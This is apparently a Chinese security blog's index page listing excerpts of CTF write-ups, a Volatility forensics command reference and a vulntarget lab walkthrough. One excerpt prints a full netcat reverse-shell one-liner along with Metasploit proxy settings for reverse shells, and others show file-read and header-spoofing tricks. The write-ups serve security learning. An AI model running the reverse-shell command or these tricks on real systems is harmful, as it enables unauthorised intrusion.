volatility常用命令
参考 12https://wiki.wgpsec.org/knowledge/ctf/Volatility.html#%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4https://blog.csdn.net/u011250160/article/details/120473177 volatility2常用模块 # 插件名称 功能 amcache 查看AmCache应用程序痕迹信息 apihooks 检测内核及进程的内存空间中的API hook atoms 列出会话及窗口站atom表 atomscan Atom表的池扫描(Pool scanner) auditpol 列出注册表HKLMSECURITYPolicyPolAdtEv的审计策略信息 bigpools 使用BigPagePoolScanner转储大分页池(big page...
NSSCTF Round#8
webMyDoorhttp://43.142.108.3:28348/index.php?file=这里应该是文件读取,直接、etc/passwd...
2023hgame部分wp
week1Classic Childhood Game简单js,我们右键源代码一下,翻一翻js文件直接搜hgame 没有,那肯定时编码或者加密了,找找可疑字符串,拿去解一下 12function mota() { var a = ['\x59\x55\x64\x6b\x61\x47\x4a\x58\x56\x6a\x64\x61\x62\x46\x5a\x31\x59\x6d\x35\x73\x53\x31\x6c\x59\x57\x6d\x68\x6a\x4d\x6b\x35\x35\x59\x56\x68\x43\x4d\x45\x70\x72\x57\x6a\x46\x69\x62\x54\x55\x31\x56\x46\x52\x43\x4d\x46\x6c\x56\x59\x7a\x42\x69\x56\x31\x59\x35']; webBecome A Member典型header头请求,cookie那个还挺难想的emmmm Referer: bunnybunnybunny.comX-Forwarded-For:...
2022弱口令安全实验室招新赛-靶机挑战
https://www.iculture.cc/rce/ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.144.128 9990 >/tmp/f setg Proxies socks5:192.168.144.128:1080 #设置全局代理set ReverseAllowProxy true #这个参数是因为使用全局代理,可能会导致我们的shell无法反弹,所以需要开启。 setg Proxies socks5:192.168.144.136:8888 #设置全局代理set ReverseAllowProxy true #这个参数是因为使用全局代理,可能会导致我们的shell无法反弹,所以需要开启。 :>fscan.exe -h 192.168.48.1/24fscan.exe -h 192.168.48.1/24 / _ \ ___ ___ _ __ __ _ | | __ / /// __|/ | ‘/ ` |/ | |/ // /\___ \ (| |...
vulntarget-c
环境相关漏洞技术:laravel、OVAS-PHP相关漏洞、隧道代理、免杀、提权、CVE-2021-3129、CVE-2021-3493等下载地址:百度云链接:https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q提取码:...
2022年天津市大学生信息安全网络攻防大赛部分wp
本来想不记录了 ,也都是网上能搜到的题,最后想了一下还是记录一下吧 理论题没啥意思 web最好的语言300pt (已做出) 考点 is_number array_search() 弱类型比较赛题地址http://ctftime1.usaas.net/web/good/index.php 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647<?phpshow_source(__FILE__);$a=0;$b=0;$c=0;$d=0;if (isset($_GET['x1'])){ $x1 = $_GET['x1']; $x1=="1"?die("ha?"):NULL; switch ($x1) { case 0: case 1: $a=1; ...
2022第五空间部分wp
misc5_简单的Base十六进制转一下字符串即可 666c61677b57656c636f6d655f686572657d flag{Welcome_here} web5_web_BaliYun考点:phar反序列化 经过目录扫描发现 www.zip index.php 123456789101112<?php include("class.php"); if(isset($_GET['img_name'])){ $down = new check_img(); echo $down->img_check(); } if(isset($_FILES["file"]["name"])){ ...
cqgamectf-1
1234567891011121314<?phphighlight_file(__FILE__);if ($_POST['cmd']) { $cmd = $_POST['cmd']; if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) { if (preg_match('/file|if|localeconv|phpversion|sqrt|et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log|var_dump|pos|current|array|time|se|ord/i', $cmd)) { die('What are you thinking?'); } else { ...
OFPPT-CTF-2022-writeup
Forensicspcap analysis1考点:流量分析 流量包下载 第一题,因为英语太菜了,这里翻译一下,大致的意思就是被入侵了,然后分析一下,这个人在搜索引擎上查找了什么 我们这里直接筛选http流量,随便点一个,看到使用的是百度,随便搜索一个名字,就可以看到,wd对应的值就是我们搜索的内容, 这里我们直接用简单方法,文件导出首选项,下面有全部的url,这里直接抄就行了。 OFPPT-CTF{charles_geschickter} pcap analysis2wireshark提取ftp流量包 这里我们可以看到许多ftp的协议,我们直接帅选ftp的流量,往下翻一番,随便找个request包,右键追踪流就可以看到了, 因为题目的要求是相同文件名,后缀不同,所以就是这两个文件,接下来提取这两包 这里直接搜索lytton-crypt.bin下面ftpdata就是数据,直接追踪 调成原始数据,save lytton-crypt.bin MD5: 4da8e81ee5b08777871e347a6b296953SHA1:...